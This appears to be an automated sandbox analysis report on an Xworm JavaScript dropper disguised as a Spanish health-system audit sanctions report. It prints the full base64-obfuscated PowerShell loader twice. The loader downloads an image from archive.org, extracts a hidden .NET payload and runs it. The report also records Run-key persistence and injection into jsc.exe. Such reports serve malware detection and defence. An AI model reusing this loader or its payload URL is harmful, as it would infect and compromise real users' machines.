Analysis
-
max time kernel
136s -
max time network
149s -
platform
windows11-21h2_x64 -
resource
win11-20250619-en -
resource tags
arch:x64arch:x86image:win11-20250619-enlocale:en-usos:windows11-21h2-x64system -
submitted
02/07/2025, 18:52
Static task
static1
Behavioral task
behavioral1
Sample
NUEVO_REPORTE_ANEXO_POR_SANCIONES_EFECTUADAS_HALLAZGOS_IRREGULARIDADES_AUDITORIA_SISTEMAS_DE_SALUD_ENTIDADES_PRESTADORAS.js
Resource
win10v2004-20250610-en
General
-
Target
NUEVO_REPORTE_ANEXO_POR_SANCIONES_EFECTUADAS_HALLAZGOS_IRREGULARIDADES_AUDITORIA_SISTEMAS_DE_SALUD_ENTIDADES_PRESTADORAS.js
-
Size
19KB
-
MD5
9f6c707c6678a8c0bf0d1fe1412b26a6
-
SHA1
3c6425c1a5dbfe0a425ee46cc1a4b9a4f8fb8ed1
-
SHA256
0fd706ebd884e6678f5d0c73c42d7ee05dcddd53963cf53542d5a8084ea82ad1
-
SHA512
c8c469d76efbde71a296f7c59537b58475a6359e823ac6800e5bc0c1b1f6f442b665fd4d0401f55da8cc8426002d686ed7af6046a22ae38f6bbec173c3127b29
-
SSDEEP
192:QTV70IM2f2BWAK/Mbk2B6BnLWlxj4eO05VG8IUZYDanl:0V1M2+M+bdYNc7v1IUyDo
Malware Config
Extracted
https://archive.org/download/universe-1733359315202-8750/universe-1733359315202-8750.jpg
https://archive.org/download/universe-1733359315202-8750/universe-1733359315202-8750.jpg
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral2/memory/4552-19-0x0000000000400000-0x000000000040E000-memory.dmp family_xworm -
Xworm family
-
Blocklisted process makes network request 6 IoCs
flow pid Process 2 5116 wscript.exe 4 1620 powershell.exe 5 1620 powershell.exe 6 1412 WScript.exe 7 1308 powershell.exe 9 1308 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 1620 powershell.exe 1308 powershell.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-625765727-1271952295-745797415-1000\Software\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\Users\\Public\\Downloads\\agnosticism.js" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-625765727-1271952295-745797415-1000\Software\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\Users\\Public\\Downloads\\agnosticism.js" powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1620 set thread context of 4552 1620 powershell.exe 89 PID 1308 set thread context of 5004 1308 powershell.exe 93 -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jsc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jsc.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-625765727-1271952295-745797415-1000_Classes\Local Settings cmd.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 1620 powershell.exe 1620 powershell.exe 1620 powershell.exe 1620 powershell.exe 1620 powershell.exe 1620 powershell.exe 1620 powershell.exe 1620 powershell.exe 1620 powershell.exe 1308 powershell.exe 1308 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1620 powershell.exe Token: SeDebugPrivilege 1308 powershell.exe Token: SeDebugPrivilege 4552 jsc.exe Token: SeDebugPrivilege 5004 jsc.exe -
Suspicious use of WriteProcessMemory 33 IoCs
description pid Process procid_target PID 5116 wrote to memory of 1620 5116 wscript.exe 79 PID 5116 wrote to memory of 1620 5116 wscript.exe 79 PID 1620 wrote to memory of 4060 1620 powershell.exe 81 PID 1620 wrote to memory of 4060 1620 powershell.exe 81 PID 5016 wrote to memory of 1412 5016 cmd.exe 86 PID 5016 wrote to memory of 1412 5016 cmd.exe 86 PID 1620 wrote to memory of 1428 1620 powershell.exe 85 PID 1620 wrote to memory of 1428 1620 powershell.exe 85 PID 1620 wrote to memory of 1428 1620 powershell.exe 85 PID 1620 wrote to memory of 956 1620 powershell.exe 87 PID 1620 wrote to memory of 956 1620 powershell.exe 87 PID 1620 wrote to memory of 956 1620 powershell.exe 87 PID 1620 wrote to memory of 4948 1620 powershell.exe 88 PID 1620 wrote to memory of 4948 1620 powershell.exe 88 PID 1620 wrote to memory of 4948 1620 powershell.exe 88 PID 1620 wrote to memory of 4552 1620 powershell.exe 89 PID 1620 wrote to memory of 4552 1620 powershell.exe 89 PID 1620 wrote to memory of 4552 1620 powershell.exe 89 PID 1620 wrote to memory of 4552 1620 powershell.exe 89 PID 1620 wrote to memory of 4552 1620 powershell.exe 89 PID 1620 wrote to memory of 4552 1620 powershell.exe 89 PID 1620 wrote to memory of 4552 1620 powershell.exe 89 PID 1620 wrote to memory of 4552 1620 powershell.exe 89 PID 1412 wrote to memory of 1308 1412 WScript.exe 90 PID 1412 wrote to memory of 1308 1412 WScript.exe 90 PID 1308 wrote to memory of 5004 1308 powershell.exe 93 PID 1308 wrote to memory of 5004 1308 powershell.exe 93 PID 1308 wrote to memory of 5004 1308 powershell.exe 93 PID 1308 wrote to memory of 5004 1308 powershell.exe 93 PID 1308 wrote to memory of 5004 1308 powershell.exe 93 PID 1308 wrote to memory of 5004 1308 powershell.exe 93 PID 1308 wrote to memory of 5004 1308 powershell.exe 93 PID 1308 wrote to memory of 5004 1308 powershell.exe 93
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\NUEVO_REPORTE_ANEXO_POR_SANCIONES_EFECTUADAS_HALLAZGOS_IRREGULARIDADES_AUDITORIA_SISTEMAS_DE_SALUD_ENTIDADES_PRESTADORAS.js1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:5116 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -noprofile -ep bypass -c "$absolutions='JGNydWVsbCA9ICdWa0ZKJzskTWFjb3dhbml0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjcnVlbGwpOyRkaXNlbWJhcmsgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkTWFjb3dhbml0ZXMpOyRzZW1pYnJldmUgPSAnUTJ4aGMzTk1hV0p5WVhKNU1TNUliMjFsJzskcGhvc3Bob3BlcHRpZGUgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tYmFzZTY0U3RyaW5nKCRzZW1pYnJldmUpOyR3b29ka25hY2tlciA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRwaG9zcGhvcGVwdGlkZSk7QWRkLVR5cGUgLUFzc2VtYmx5TmFtZSBTeXN0ZW0uRHJhd2luZzskdGVsZW9sb2dpc209J2h0dHBzOi8vYXJjaGl2ZS5vcmcvZG93bmxvYWQvdW5pdmVyc2UtMTczMzM1OTMxNTIwMi04NzUwL3VuaXZlcnNlLTE3MzMzNTkzMTUyMDItODc1MC5qcGcnOyRwb2xvbmlmZXJvdXM9TmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskcG9sb25pZmVyb3VzLkhlYWRlcnMuQWRkKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAnKTskcG94dmlydXM9JHBvbG9uaWZlcm91cy5Eb3dubG9hZERhdGEoJHRlbGVvbG9naXNtKTskcHJlc2NpZW50aWZpYz1bYnl0ZVtdXSgweDQyLCAweDRELCAweDcyLCAweDZFLCAweDM3LCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDM2LCAweDAwLCAweDAwLCAweDAwLCAweDI4LCAweDAwLCAweDAwLCAweDAwLCAweDY0LCAweDAwLCAweDAwLCAweDAwLCAweDRELCAweDJGLCAweDAwLCAweDAwLCAweDAxLCAweDAwLCAweDE4LCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDNDLCAweDZFLCAweDM3LCAweDAwLCAweEM0LCAweDBFLCAweDAwLCAweDAwLCAweEM0LCAweDBFLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwKTskZHVzdG1lbj0tMTtmb3IoJGRpc3NpbWlsYXI9MDskZGlzc2ltaWxhciAtbGUgJHBveHZpcnVzLkxlbmd0aC0kcHJlc2NpZW50aWZpYy5MZW5ndGg7JGRpc3NpbWlsYXIrKyl7ICRub25tZWF0PSR0cnVlO2ZvcigkbWljcm9icmV3ZWQ9MDskbWljcm9icmV3ZWQgLWx0ICRwcmVzY2llbnRpZmljLkxlbmd0aDskbWljcm9icmV3ZWQrKyl7aWYoJHBveHZpcnVzWyRkaXNzaW1pbGFyKyRtaWNyb2JyZXdlZF0gLW5lICRwcmVzY2llbnRpZmljWyRtaWNyb2JyZXdlZF0peyRub25tZWF0PSRjcmFwbmVsO2JyZWFrfX1pZigkbm9ubWVhdCl7JGR1c3RtZW49JGRpc3NpbWlsYXI7YnJlYWt9fWlmKCRkdXN0bWVuIC1lcSAtMSl7cmV0dXJufTskQXNoZXZpbGxlPSRwb3h2aXJ1c1skZHVzdG1lbi4uKCRwb3h2aXJ1cy5MZW5ndGgtMSldOyRTbmFrZT1OZXctT2JqZWN0IElPLk1lbW9yeVN0cmVhbTskU25ha2UuV3JpdGUoJEFzaGV2aWxsZSwwLCRBc2hldmlsbGUuTGVuZ3RoKTskU25ha2UuU2VlaygwLCdCZWdpbicpfE91dC1OdWxsOyRtZXRhZXNjYWxpbmU9W0RyYXdpbmcuQml0bWFwXTo6RnJvbVN0cmVhbSgkU25ha2UpOyRtb2JpbGl0aWVzPU5ldy1PYmplY3QgQ29sbGVjdGlvbnMuR2VuZXJpYy5MaXN0W0J5dGVdO2ZvcigkcHJhdGlxdWVzPTA7JHByYXRpcXVlcyAtbHQgJG1ldGFlc2NhbGluZS5IZWlnaHQ7JHByYXRpcXVlcysrKXtmb3IoJHNwdXR0ZXJlcj0wOyRzcHV0dGVyZXIgLWx0ICRtZXRhZXNjYWxpbmUuV2lkdGg7JHNwdXR0ZXJlcisrKXskb2xpZ29uZXBocm91cz0kbWV0YWVzY2FsaW5lLkdldFBpeGVsKCRzcHV0dGVyZXIsJHByYXRpcXVlcyk7JG1vYmlsaXRpZXMuQWRkKCRvbGlnb25lcGhyb3VzLlIpOyRtb2JpbGl0aWVzLkFkZCgkb2xpZ29uZXBocm91cy5HKTskbW9iaWxpdGllcy5BZGQoJG9saWdvbmVwaHJvdXMuQil9fTskb3N0ZW90aGVjYT1bQml0Q29udmVydGVyXTo6VG9JbnQzMigkbW9iaWxpdGllcy5HZXRSYW5nZSgwLDQpLlRvQXJyYXkoKSwwKTskQWxpY29ybnM9JG1vYmlsaXRpZXMuR2V0UmFuZ2UoNCwkb3N0ZW90aGVjYSkuVG9BcnJheSgpOyRDYXJsb3ZpbmdpYW49W0NvbnZlcnRdOjpUb0Jhc2U2NFN0cmluZygkQWxpY29ybnMpLlJlcGxhY2UoJ0EnLCdAJykuUmVwbGFjZSgnQCcsJ0EnKTskc3F1YWxsZXI9JzBoSGR1SXpZeklETjRNRE14Y1RZNE1qWTJnRE0yUUdOM2dETzFNek5pSkRNMUVUWmY5bWRwVlhjeUYyTH1eOTJZdWMyYnNKMmIwTlhaMjlHYnVRbmNoUjNjczkyYndSV1lsUjJMdm9EYzBSSGEnLlJlcGxhY2UoJ31eJywndCcpOyRiZWRhZz1bQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJENhcmxvdmluZ2lhbik7JG1hbmh1bnRzPVtSZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkYmVkYWcpOyRnYW1ibGVkPUAoJHNxdWFsbGVyLCcxJywnQzpcVXNlcnNcUHVibGljXERvd25sb2FkcycsJ2Fnbm9zdGljaXNtJywnanNjJywnJywnJywnJywnJywnJywnJywnanMnLCcnLCcnLCcnLCcyJywnJyk7JG1hbmh1bnRzLkdldFR5cGUoJHdvb2RrbmFja2VyKS5HZXRNZXRob2QoJGRpc2VtYmFyaykuSW52b2tlKCR0YWxsaWFnZSwkZ2FtYmxlZCk7JG1ldGFlc2NhbGluZS5EaXNwb3NlKCk7JFNuYWtlLkRpc3Bvc2UoKQ==';$Paleocene=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($absolutions));Invoke-Expression $Paleocene"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1620 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C copy *.js "C:\Users\Public\Downloads\agnosticism.js"3⤵PID:4060
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"3⤵PID:1428
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"3⤵PID:956
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"3⤵PID:4948
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4552
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Public\Downloads\agnosticism.js1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:5016 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Public\Downloads\agnosticism.js"2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1412 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -noprofile -ep bypass -c "$absolutions='JGNydWVsbCA9ICdWa0ZKJzskTWFjb3dhbml0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjcnVlbGwpOyRkaXNlbWJhcmsgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkTWFjb3dhbml0ZXMpOyRzZW1pYnJldmUgPSAnUTJ4aGMzTk1hV0p5WVhKNU1TNUliMjFsJzskcGhvc3Bob3BlcHRpZGUgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tYmFzZTY0U3RyaW5nKCRzZW1pYnJldmUpOyR3b29ka25hY2tlciA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRwaG9zcGhvcGVwdGlkZSk7QWRkLVR5cGUgLUFzc2VtYmx5TmFtZSBTeXN0ZW0uRHJhd2luZzskdGVsZW9sb2dpc209J2h0dHBzOi8vYXJjaGl2ZS5vcmcvZG93bmxvYWQvdW5pdmVyc2UtMTczMzM1OTMxNTIwMi04NzUwL3VuaXZlcnNlLTE3MzMzNTkzMTUyMDItODc1MC5qcGcnOyRwb2xvbmlmZXJvdXM9TmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskcG9sb25pZmVyb3VzLkhlYWRlcnMuQWRkKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAnKTskcG94dmlydXM9JHBvbG9uaWZlcm91cy5Eb3dubG9hZERhdGEoJHRlbGVvbG9naXNtKTskcHJlc2NpZW50aWZpYz1bYnl0ZVtdXSgweDQyLCAweDRELCAweDcyLCAweDZFLCAweDM3LCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDM2LCAweDAwLCAweDAwLCAweDAwLCAweDI4LCAweDAwLCAweDAwLCAweDAwLCAweDY0LCAweDAwLCAweDAwLCAweDAwLCAweDRELCAweDJGLCAweDAwLCAweDAwLCAweDAxLCAweDAwLCAweDE4LCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDNDLCAweDZFLCAweDM3LCAweDAwLCAweEM0LCAweDBFLCAweDAwLCAweDAwLCAweEM0LCAweDBFLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwKTskZHVzdG1lbj0tMTtmb3IoJGRpc3NpbWlsYXI9MDskZGlzc2ltaWxhciAtbGUgJHBveHZpcnVzLkxlbmd0aC0kcHJlc2NpZW50aWZpYy5MZW5ndGg7JGRpc3NpbWlsYXIrKyl7ICRub25tZWF0PSR0cnVlO2ZvcigkbWljcm9icmV3ZWQ9MDskbWljcm9icmV3ZWQgLWx0ICRwcmVzY2llbnRpZmljLkxlbmd0aDskbWljcm9icmV3ZWQrKyl7aWYoJHBveHZpcnVzWyRkaXNzaW1pbGFyKyRtaWNyb2JyZXdlZF0gLW5lICRwcmVzY2llbnRpZmljWyRtaWNyb2JyZXdlZF0peyRub25tZWF0PSRjcmFwbmVsO2JyZWFrfX1pZigkbm9ubWVhdCl7JGR1c3RtZW49JGRpc3NpbWlsYXI7YnJlYWt9fWlmKCRkdXN0bWVuIC1lcSAtMSl7cmV0dXJufTskQXNoZXZpbGxlPSRwb3h2aXJ1c1skZHVzdG1lbi4uKCRwb3h2aXJ1cy5MZW5ndGgtMSldOyRTbmFrZT1OZXctT2JqZWN0IElPLk1lbW9yeVN0cmVhbTskU25ha2UuV3JpdGUoJEFzaGV2aWxsZSwwLCRBc2hldmlsbGUuTGVuZ3RoKTskU25ha2UuU2VlaygwLCdCZWdpbicpfE91dC1OdWxsOyRtZXRhZXNjYWxpbmU9W0RyYXdpbmcuQml0bWFwXTo6RnJvbVN0cmVhbSgkU25ha2UpOyRtb2JpbGl0aWVzPU5ldy1PYmplY3QgQ29sbGVjdGlvbnMuR2VuZXJpYy5MaXN0W0J5dGVdO2ZvcigkcHJhdGlxdWVzPTA7JHByYXRpcXVlcyAtbHQgJG1ldGFlc2NhbGluZS5IZWlnaHQ7JHByYXRpcXVlcysrKXtmb3IoJHNwdXR0ZXJlcj0wOyRzcHV0dGVyZXIgLWx0ICRtZXRhZXNjYWxpbmUuV2lkdGg7JHNwdXR0ZXJlcisrKXskb2xpZ29uZXBocm91cz0kbWV0YWVzY2FsaW5lLkdldFBpeGVsKCRzcHV0dGVyZXIsJHByYXRpcXVlcyk7JG1vYmlsaXRpZXMuQWRkKCRvbGlnb25lcGhyb3VzLlIpOyRtb2JpbGl0aWVzLkFkZCgkb2xpZ29uZXBocm91cy5HKTskbW9iaWxpdGllcy5BZGQoJG9saWdvbmVwaHJvdXMuQil9fTskb3N0ZW90aGVjYT1bQml0Q29udmVydGVyXTo6VG9JbnQzMigkbW9iaWxpdGllcy5HZXRSYW5nZSgwLDQpLlRvQXJyYXkoKSwwKTskQWxpY29ybnM9JG1vYmlsaXRpZXMuR2V0UmFuZ2UoNCwkb3N0ZW90aGVjYSkuVG9BcnJheSgpOyRDYXJsb3ZpbmdpYW49W0NvbnZlcnRdOjpUb0Jhc2U2NFN0cmluZygkQWxpY29ybnMpLlJlcGxhY2UoJ0EnLCdAJykuUmVwbGFjZSgnQCcsJ0EnKTskc3F1YWxsZXI9JzBoSGR1SXpZeklETjRNRE14Y1RZNE1qWTJnRE0yUUdOM2dETzFNek5pSkRNMUVUWmY5bWRwVlhjeUYyTH1eOTJZdWMyYnNKMmIwTlhaMjlHYnVRbmNoUjNjczkyYndSV1lsUjJMdm9EYzBSSGEnLlJlcGxhY2UoJ31eJywndCcpOyRiZWRhZz1bQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJENhcmxvdmluZ2lhbik7JG1hbmh1bnRzPVtSZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkYmVkYWcpOyRnYW1ibGVkPUAoJHNxdWFsbGVyLCcxJywnQzpcVXNlcnNcUHVibGljXERvd25sb2FkcycsJ2Fnbm9zdGljaXNtJywnanNjJywnJywnJywnJywnJywnJywnJywnanMnLCcnLCcnLCcnLCcyJywnJyk7JG1hbmh1bnRzLkdldFR5cGUoJHdvb2RrbmFja2VyKS5HZXRNZXRob2QoJGRpc2VtYmFyaykuSW52b2tlKCR0YWxsaWFnZSwkZ2FtYmxlZCk7JG1ldGFlc2NhbGluZS5EaXNwb3NlKCk7JFNuYWtlLkRpc3Bvc2UoKQ==';$Paleocene=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($absolutions));Invoke-Expression $Paleocene"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1308 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5004
-
-
-
Network
MITRE ATT&CK Enterprise v16
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD58db89638d25eb835085ddae51b7df0ff
SHA16b06c8b024f2b5bbcb0ca2323aac080ca2b101dd
SHA256b76abef376e058bbf246be196a0de223552b11bce715cf65f6073f678164de35
SHA51264919bb2796afcd347264233053d7275c8171e544ce02313f21a77d26bdbfc5af0e9ab069cb256d1ce1996019c6fb320a5880bb4556ef0748ef3bf8dd17e05e8
-
Filesize
1KB
MD57b5fe43dda2544ecf1948d765ad2a49a
SHA1b9a52f5a2981e7dcc1046e91fd3f78e216bf9578
SHA2565d441b6c6a153bed01c7e976a0f82e67e38f043f8b0296ae56a57024a7441830
SHA5128146dc9526ebba7fcd7c8258759a6212cac27fc70afe1ddc712409d1af757cef4d7944aa2856962d8f05c0f569fe9b3e2302d7ca42d6f3f49d085b12ef46a926
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
19KB
MD59b49b1a2e0327767db6dc4883654dd22
SHA1486be1d6c5d4f2f6d7b80613aeae32ed3a7a69ba
SHA256761b67f0715d7f89c50cdb2dd4a18a49952a21d301907bafbaf0942179afdb30
SHA512b473926aa77d0827eefeafc7ee8a59989e936ef3c0b7b316b0ab5eb7a34a993c2734419c7a80c8505904dcdb31c672156f33fe6e26084b3d8e8c1b565f6bc206